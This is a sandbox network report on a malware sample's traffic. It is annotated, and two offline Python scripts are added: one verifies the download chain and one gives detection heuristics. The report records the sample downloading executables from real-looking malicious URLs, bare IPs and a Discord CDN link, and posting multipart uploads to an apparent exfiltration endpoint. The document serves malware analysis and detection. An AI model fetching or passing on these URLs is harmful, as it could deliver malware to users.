Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
58yongzhe.com | 62.133.62.93 | |
yip.su | 104.21.79.77 | |
pastebin.com | 172.67.19.24 | |
cdn.discordapp.com | 162.159.133.233 | |
tvezx20pt.top | 77.232.42.234 | |
TCP Requests

Source | Destination | Host |
---|---|---|
192.168.56.103:49164 | 104.21.79.77:443 | yip.su |
192.168.56.103:49169 | 104.21.79.77:443 | yip.su |
192.168.56.103:49172 | 162.159.135.233:443 | cdn.discordapp.com |
192.168.56.103:49163 | 172.67.19.24:443 | pastebin.com |
192.168.56.103:49166 | 172.67.19.24:443 | pastebin.com |
192.168.56.103:49168 | 194.58.114.223:80 | (requested by IP, no hostname) |
192.168.56.103:49171 | 62.133.62.93:80 | 58yongzhe.com |
192.168.56.103:49180 | 77.232.42.234:80 | tvezx20pt.top |
192.168.56.103:49202 | 77.232.42.234:80 | tvezx20pt.top |
192.168.56.103:49207 | 77.232.42.234:80 | tvezx20pt.top |
192.168.56.103:49167 | 91.121.59.207:80 | (requested by IP, no hostname) |
192.168.56.103:49170 | 91.121.59.207:80 | (requested by IP, no hostname) |

Note: the DNS table lists 162.159.133.233 for cdn.discordapp.com while the TLS connection went to 162.159.135.233. Both are Cloudflare addresses for that name; the answer presumably carried more than one A record and the table shows only the first.
UDP Requests

Source | Destination | Service |
---|---|---|
192.168.56.101:137 | 192.168.56.103:137 | NetBIOS name service (inbound from another host on the analysis subnet) |
192.168.56.103:50800 | 164.124.101.2:53 | DNS |
192.168.56.103:52760 | 164.124.101.2:53 | DNS |
192.168.56.103:53673 | 164.124.101.2:53 | DNS |
192.168.56.103:56613 | 164.124.101.2:53 | DNS |
192.168.56.103:62576 | 164.124.101.2:53 | DNS |
192.168.56.103:64894 | 164.124.101.2:53 | DNS |
192.168.56.103:137 | 192.168.56.255:137 | NetBIOS name service (subnet broadcast) |
192.168.56.103:50803 | 239.255.255.250:1900 | SSDP (multicast discovery) |

The NetBIOS and SSDP traffic is normal Windows background noise on the analysis network; the DNS queries to 164.124.101.2 are the lookups for the names in the table above.

HTTP Requests
GET https://pastebin.com/raw/E0rY26ni
Status: 0 (no HTTP response was captured for this request)
Request:
GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
GET https://yip.su/RNWPd.exe
Status: 403
Request:
GET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
Response:
HTTP/1.1 403 Forbidden
Date: Sat, 17 Aug 2024 13:13:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: n/sGuqd0Cy6hGoUYBFX5utBcSXSkGUHgRCmaSe4sONqrXL8h971Y++tIWk2cDcaktyxjZ1xS3TmWniXcF+d09i80d4ClO2f1dPDVcW6M4KI=$0yOO2wJ+nro5mnsTD2YysA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tTLFx2a%2FgEkCqm37SH1xbBxRMrsXjRmzAKcoaH5aSGa3lKv1usi4krtJXWeYgHhfDGnvlbDxRb4TJk9D9IrF7xpcRASRjfhiWmeP04c2JLpUi8EiLA8XbtI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49eb62f8883173-LAX
alt-svc: h3=":443"; ma=86400
Note: cf-mitigated: challenge means Cloudflare answered with its managed challenge page rather than the file, so the sample did not obtain RNWPd.exe in this run. The request carries no User-Agent header, which is one of the signals such challenges key on.
GET https://cdn.discordapp.com/attachments/1272578305203110022/1274336696627892317/setup.exe?ex=66c1e208&is=66c09088&hm=d301fab09c009c8ddf7bbdaccf84e9e284b1d644909338534cae1eab5b7ee0ef&
Status: 200
Request:
GET /attachments/1272578305203110022/1274336696627892317/setup.exe?ex=66c1e208&is=66c09088&hm=d301fab09c009c8ddf7bbdaccf84e9e284b1d644909338534cae1eab5b7ee0ef& HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:13:05 GMT
Content-Type: application/x-msdos-program
Content-Length: 7601622
Connection: keep-alive
CF-Ray: 8b49eb6348cd8b5e-ICN
CF-Cache-Status: HIT
Accept-Ranges: bytes, bytes
Age: 3259
Cache-Control: public, max-age=31536000
Content-Disposition: attachment; filename="setup.exe"
ETag: "45a96ed03c6c80865fd53dc008908681"
Expires: Sun, 17 Aug 2025 13:13:05 GMT
Last-Modified: Sat, 17 Aug 2024 11:59:04 GMT
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-goog-generation: 1723895944594477
x-goog-hash: crc32c=46TzuA==
x-goog-hash: md5=Ralu0DxsgIZf1T3ACJCGgQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 7601622
x-guploader-uploadid: AHxI1nNDp89N3DuWlpEuw8Y_zGKiUQGznU7M-C3AUc0AYesDZh4eG1zK_DUpC07514OBm87rFAQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=GSL_.ZE0RlPSK7oWIBCYiQwJqfK.C5QV.MGIY_zaBng-1723900385-1.0.1.1-0Pyyjp_icNe2qP6_CpwUo.g0CJUxEzq3qkNNvz8whpsE9k7xG27m1xC5pCdDjBWDiU2bTZIXtLcAqZztJAOb3w; path=/; expires=Sat, 17-Aug-24 13:43:05 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JskCdSJUqPGheemol0QabKKaJaZIe5iqjMU34PCIR5F84v1EGsmh8GhYnPT0Khf5iVB67eqze0FhNrTWHhPZlkQLAV7ca9G6Fo95b1Q4gO16kQPFIU21OFuF8KVkRyo8EzxG4w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=k7IrHkX6HNPcuKqYU4RIQb.dTWkMyET3fNgr3oSXlFs-1723900385892-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
Note: the x-goog-* headers show the object is served from Google Cloud Storage behind Cloudflare. The base64 x-goog-hash md5 value decodes to 45a96ed03c6c80865fd53dc008908681, the same value as the ETag, so a carved copy of setup.exe can be verified against it. The URL's is and ex parameters are hex Unix timestamps: is=66c09088 is 2024-08-17 11:59:04 UTC (identical to Last-Modified, i.e. the upload time) and ex=66c1e208 is exactly 24 hours later, so this signed link stopped working on 2024-08-18 11:59:04 UTC.
GET http://91.121.59.207/Files/Channel1.exe
Status: 200
Request:
GET /Files/Channel1.exe HTTP/1.1
Host: 91.121.59.207
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:13:03 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Fri, 16 Aug 2024 19:24:53 GMT
ETag: "651af0-61fd1e9ec45c4"
Accept-Ranges: bytes
Content-Length: 6626032
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET http://194.58.114.223/d/385104
Status: 302
Request:
GET /d/385104 HTTP/1.1
Host: 194.58.114.223
Connection: Keep-Alive
Response:
HTTP/1.1 302 Found
Server: nginx
Date: Sat, 17 Aug 2024 13:13:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
Location: https://cdn.discordapp.com/attachments/1272578305203110022/1274336696627892317/setup.exe?ex=66c1e208&is=66c09088&hm=d301fab09c009c8ddf7bbdaccf84e9e284b1d644909338534cae1eab5b7ee0ef&
Note: this bare-IP redirector hands out the signed Discord CDN link fetched above; the redirect was requested one second before the setup.exe download.
GET http://91.121.59.207/Files/6ec431703915b7c3a66be6ef8e2bf8f9.exe
Status: 200
Request:
GET /Files/6ec431703915b7c3a66be6ef8e2bf8f9.exe HTTP/1.1
Host: 91.121.59.207
Response:
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:13:05 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Sat, 17 Aug 2024 11:18:28 GMT
ETag: "1bb066-61fdf3c309735"
Accept-Ranges: bytes
Content-Length: 1814630
Content-Type: application/x-msdownload
GET http://58yongzhe.com/parts/setup1.exe
Status: 200
Request:
GET /parts/setup1.exe HTTP/1.1
Host: 58yongzhe.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:13:06 GMT
Server: nginx/1.26.1
Content-Type: application/x-dosexec
Content-Length: 265728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
POST http://tvezx20pt.top/v1/upload.php
Status: 200
Request:
POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary39477433
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 413
Host: tvezx20pt.top
Response:
HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 17 Aug 2024 13:13:38 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"

POST http://tvezx20pt.top/v1/upload.php
Status: 200
Request:
POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary23686319
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 67008
Host: tvezx20pt.top
Response:
HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 17 Aug 2024 13:13:51 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"

POST http://tvezx20pt.top/v1/upload.php
Status: 200
Request:
POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary13498587
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 19003
Host: tvezx20pt.top
Response:
HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 17 Aug 2024 13:13:56 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
Note: three multipart uploads (413, 67008 and 19003 bytes) went to the same endpoint within 18 seconds, each answered with an identical 2-byte text/plain body (the body itself was not recorded). The requests present a Chrome user agent but none of the Accept, Accept-Encoding or Accept-Language headers a browser sends, so the user agent is spoofed by a non-browser HTTP client. The weak ETag of the form W/"2-<27 base64 chars>" is the length-plus-SHA1 format produced by the Node.js etag package (the Express default), consistent with nginx proxying to a Node application.
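The following script is an added example, not part of the sandbox report, that performs the checks a practitioner would run on the redirector-to-Discord leg of the chain above: it parses the raw response heads, confirms the 302 Location is the URL that was actually fetched, decodes the hex `is`/`ex` timestamps in the signed Discord link and compares the issue time with the object's Last-Modified, and converts the base64 x-goog-hash MD5 to hex so it can be matched against the ETag or a local md5sum of the carved file. The header blocks are copied from the records above and embedded inline (constructed test data), so nothing is fetched from the network.

```python
"""Checks on the redirector -> Discord CDN download recorded above.

Added example, not part of the sandbox report. The header blocks below are
copied from the report's records (constructed inline so the script runs
offline); nothing is fetched from the network.
"""
import base64
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from urllib.parse import parse_qs, urlsplit

DISCORD_URL = (
    "https://cdn.discordapp.com/attachments/1272578305203110022/"
    "1274336696627892317/setup.exe?ex=66c1e208&is=66c09088"
    "&hm=d301fab09c009c8ddf7bbdaccf84e9e284b1d644909338534cae1eab5b7ee0ef&"
)

# 302 from the bare-IP redirector (headers trimmed to those used here).
REDIRECT_RESPONSE = (
    "HTTP/1.1 302 Found\n"
    "Server: nginx\n"
    "Content-Type: text/html; charset=UTF-8\n"
    "Location: " + DISCORD_URL + "\n"
)

# 200 from the Discord CDN for setup.exe (headers trimmed to those used here).
DISCORD_RESPONSE = """HTTP/1.1 200 OK
Content-Type: application/x-msdos-program
Content-Length: 7601622
ETag: "45a96ed03c6c80865fd53dc008908681"
Last-Modified: Sat, 17 Aug 2024 11:59:04 GMT
x-goog-hash: crc32c=46TzuA==
x-goog-hash: md5=Ralu0DxsgIZf1T3ACJCGgQ==
"""


def parse_response(raw):
    """Split a raw HTTP/1.1 response head into (status, {name: [values]}).
    Names are lower-cased; repeated headers such as x-goog-hash keep every
    value instead of the last one silently winning."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def gcs_md5_hex(headers):
    """Google Cloud Storage (the x-goog-* headers show it backs this CDN)
    publishes the object's MD5 base64-encoded in x-goog-hash; return it as
    hex so it can be compared with the ETag or with md5sum of the file."""
    for value in headers.get("x-goog-hash", []):
        algo, _, digest = value.partition("=")
        if algo == "md5":
            return base64.b64decode(digest).hex()
    return None


def discord_url_times(url):
    """Discord attachment URLs carry `is` (issued) and `ex` (expiry) as hex
    Unix timestamps; `hm` is Discord's signature over the link."""
    q = parse_qs(urlsplit(url).query)
    issued = datetime.fromtimestamp(int(q["is"][0], 16), tz=timezone.utc)
    expires = datetime.fromtimestamp(int(q["ex"][0], 16), tz=timezone.utc)
    return issued, expires


def check_chain(redirect_raw, final_url, final_raw):
    """Tie the 302 to the object actually fetched: Location must equal the
    URL, the signed issue time must match the object's Last-Modified, and
    the server-side MD5 must match the ETag."""
    status, rh = parse_response(redirect_raw)
    _, fh = parse_response(final_raw)
    issued, expires = discord_url_times(final_url)
    last_modified = parsedate_to_datetime(fh["last-modified"][0])
    md5_hex = gcs_md5_hex(fh)
    etag = fh["etag"][0].strip('"').lower()
    return {
        "redirect_ok": status == 302 and rh["location"][0] == final_url,
        "issued_matches_last_modified": issued == last_modified,
        "link_lifetime_hours": (expires - issued).total_seconds() / 3600,
        "md5_hex": md5_hex,
        "etag_matches_md5": etag == md5_hex,
        "size": int(fh["content-length"][0]),
    }


if __name__ == "__main__":
    for key, value in check_chain(REDIRECT_RESPONSE, DISCORD_URL, DISCORD_RESPONSE).items():
        print(f"{key}: {value}")
```

Run it against the full header blocks from a report of your own by pasting them into the two constants; if `etag_matches_md5` is true, the MD5 in the ETag is the hash to look for in a sandbox's dropped-files list or on a file-reputation service.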
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata alerts.
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49163 -> 172.67.19.24:443 | C=US, O=Google Trust Services, CN=WE1 | CN=pastebin.com | e3:4a:2e:16:cc:2b:72:f6:c5:22:3e:52:49:b3:50:2a:1b:85:6f:8b |
TLS 1.2 192.168.56.103:49164 -> 104.21.79.77:443 | C=US, O=Google Trust Services, CN=WE1 | CN=yip.su | 54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca |
TLS 1.2 192.168.56.103:49166 -> 172.67.19.24:443 | (none) | (none) | (none; no certificate observed on this flow) |
TLS 1.2 192.168.56.103:49169 -> 104.21.79.77:443 | C=US, O=Google Trust Services, CN=WE1 | CN=yip.su | 54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca |
TLS 1.2 192.168.56.103:49172 -> 162.159.135.233:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=discordapp.com | 97:8b:ee:ad:1e:bf:a1:69:e7:94:29:f7:55:7a:29:64:19:c7:81:39 |
Snort Alerts
No Snort Alerts
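Neither Suricata nor Snort raised an alert on this traffic. As an added example, not taken from the report or from either IDS ruleset, the following Python encodes four heuristics a detection engineer could key on from the HTTP exchanges above: an executable fetched over cleartext HTTP from a bare IP literal, an executable download with no User-Agent header at all, a redirect whose Location is an executable on Discord's attachment CDN, and a multipart POST that claims a Chrome user agent while omitting every Accept header a browser sends and is answered with a near-empty body. The input is a hand-built list of transactions reconstructed from the records above (constructed data); the record field names and rule names are this example's own.

```python
"""Heuristics that would have flagged the HTTP traffic in the report above.

Added example, not part of the report or of any IDS ruleset. Transactions are
reconstructed from the report's records (constructed data); header names are
lower-cased and field names are this example's own.
"""
import ipaddress

DISCORD_URL = ("https://cdn.discordapp.com/attachments/1272578305203110022/"
               "1274336696627892317/setup.exe?ex=66c1e208&is=66c09088"
               "&hm=d301fab09c009c8ddf7bbdaccf84e9e284b1d644909338534cae1eab5b7ee0ef&")
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36")

EXE_TYPES = {"application/x-msdownload", "application/x-dosexec",
             "application/x-msdos-program"}
# A real Chrome build sends all of these on every request it originates.
BROWSER_HEADERS = {"accept", "accept-encoding", "accept-language"}

TRANSACTIONS = [  # constructed from the report's HTTP records
    {"method": "GET", "url": "http://194.58.114.223/d/385104", "status": 302,
     "req": {"host": "194.58.114.223", "connection": "Keep-Alive"},
     "resp": {"content-type": "text/html; charset=UTF-8", "location": DISCORD_URL}},
    {"method": "GET", "url": DISCORD_URL, "status": 200,
     "req": {"host": "cdn.discordapp.com", "connection": "Keep-Alive"},
     "resp": {"content-type": "application/x-msdos-program", "content-length": "7601622",
              "content-disposition": 'attachment; filename="setup.exe"'}},
    {"method": "GET", "url": "http://91.121.59.207/Files/Channel1.exe", "status": 200,
     "req": {"host": "91.121.59.207", "connection": "Keep-Alive"},
     "resp": {"content-type": "application/x-msdownload", "content-length": "6626032"}},
    {"method": "GET", "url": "http://91.121.59.207/Files/6ec431703915b7c3a66be6ef8e2bf8f9.exe",
     "status": 200, "req": {"host": "91.121.59.207"},
     "resp": {"content-type": "application/x-msdownload", "content-length": "1814630"}},
    {"method": "GET", "url": "http://58yongzhe.com/parts/setup1.exe", "status": 200,
     "req": {"host": "58yongzhe.com", "connection": "Keep-Alive"},
     "resp": {"content-type": "application/x-dosexec", "content-length": "265728"}},
    {"method": "POST", "url": "http://tvezx20pt.top/v1/upload.php", "status": 200,
     "req": {"host": "tvezx20pt.top", "connection": "Keep-Alive", "pragma": "no-cache",
             "cache-control": "no-cache", "user-agent": CHROME_UA, "content-length": "67008",
             "content-type": "multipart/form-data; boundary=----Boundary23686319"},
     "resp": {"content-type": "text/plain; charset=utf-8", "content-length": "2"}},
]


def is_ip_literal(host):
    """True when the Host header is a bare IPv4/IPv6 address (optional :port)."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0] if host.count(":") == 1 else host)
        return True
    except ValueError:
        return False


def is_executable(tx):
    ctype = tx["resp"].get("content-type", "").split(";")[0].strip().lower()
    return ctype in EXE_TYPES or tx["url"].split("?")[0].lower().endswith(".exe")


def rule_cleartext_exe_from_ip(tx):
    return (tx["method"] == "GET" and tx["url"].startswith("http://")
            and is_ip_literal(tx["req"].get("host", "")) and is_executable(tx))


def rule_exe_without_user_agent(tx):
    return tx["method"] == "GET" and is_executable(tx) and "user-agent" not in tx["req"]


def rule_redirect_to_cdn_exe(tx):
    loc = tx["resp"].get("location", "")
    return (tx["status"] in (301, 302, 307, 308)
            and "cdn.discordapp.com/attachments/" in loc
            and loc.split("?")[0].lower().endswith(".exe"))


def rule_spoofed_browser_upload(tx):
    """Multipart POST wearing a Chrome UA but lacking every Accept* header a
    browser sends, answered with a tiny body: the shape of an automated
    upload from a non-browser client, not a form submitted by a user."""
    req = tx["req"]
    return (tx["method"] == "POST"
            and req.get("content-type", "").startswith("multipart/form-data")
            and "Chrome/" in req.get("user-agent", "")
            and not (BROWSER_HEADERS & set(req))
            and int(tx["resp"].get("content-length", "0")) <= 16)


RULES = {
    "cleartext-exe-from-ip-literal": rule_cleartext_exe_from_ip,
    "exe-download-without-user-agent": rule_exe_without_user_agent,
    "redirect-to-cdn-hosted-exe": rule_redirect_to_cdn_exe,
    "spoofed-browser-multipart-upload": rule_spoofed_browser_upload,
}


def detect(transactions):
    """Return {rule_name: [matching URLs]} for a list of transactions."""
    hits = {name: [] for name in RULES}
    for tx in transactions:
        for name, rule in RULES.items():
            if rule(tx):
                hits[name].append(tx["url"])
    return hits


if __name__ == "__main__":
    for name, urls in detect(TRANSACTIONS).items():
        print(f"{name}: {len(urls)} hit(s)")
        for url in urls:
            print(f"  {url}")
```

The user-agent rule is the one worth keeping generic: the Accept-header check, not the UA string, is what separates a real browser from WinHTTP-style clients that copy a browser UA, so it keeps working when the sample's hard-coded Chrome version changes.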